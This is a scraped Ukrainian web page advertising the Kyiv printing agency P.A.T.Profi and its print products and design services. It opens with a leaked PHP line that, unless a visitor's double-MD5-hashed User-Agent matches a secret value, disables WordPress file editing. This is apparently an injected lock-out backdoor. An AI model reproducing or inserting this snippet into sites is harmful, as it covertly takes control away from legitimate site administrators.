if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Поліграфія у Києві, Україні за доступними цінами від агентства PATProfi

Поліграфія

Друкарня компанії P.A.T.Profi є однією з лідерів на ринку поліграфічних послуг України. Починаючи з 2002 року ми здійснюємо виготовлення друкованої продукції, вирішуючи всі необхідні задачі у цій сфері для своїх клієнтів. Наш досвід, висококваліфіковані фахівці і сучасне поліграфічне обладнання дозволяють отримувати у підсумку високоякісну продукцію і повне дотримання термінів виготовлення.

Яку поліграфічну продукцію можна замовити?

Звернувшись до нас, ви можете замовити розробку та виготовлення такої продукції:

візитки

листівки

буклети

папки

каталоги

сувеніри

шелфтокери

пазли

паперові пакети

плакати

календарі

блокноти

книги

конверти

наліпки

друк на футболках

пластикові карти

цінники

брошури

журнали

бірки

Як відбувається виготовлення поліграфічної продукції?

Співпраця з нами складається з декількох етапів:

Розробка дизайну макетів

Після звернення клієнта наші дизайнери створюють макети з урахуванням побажань і потреб замовника. Також на цьому етапі здійснюється верстка, редагування макетів і додрукарська підготовка. У разі необхідності всі роботи виконуються в терміновому порядку. Це дозволяє оперативно вирішити будь-які поліграфічні питання.

Сувенірна продукція з логотипом

Залежно від тиражу продукції використовується цифровий або офсетний спосіб друку. Також наша компанія здійснює широкоформатний друк, використовуючи для цього різні матеріали – ПВХ, пенокартон, акрил.

Поліграфічні послуги та друк

Одним з напрямків діяльності нашої компанії є розробка і виготовлення сувенірної продукції з нанесеним логотипом. Це особливо важливо, якщо Ваша компанія бажає просунути свій бренд, привернути до себе цільову аудиторію та увагу потенційних клієнтів.

Починаючи працювати над будь-яким проектом, ми завжди готові допомогти клієнту і надати відповіді на всі супутні питання, переважно безкоштовно.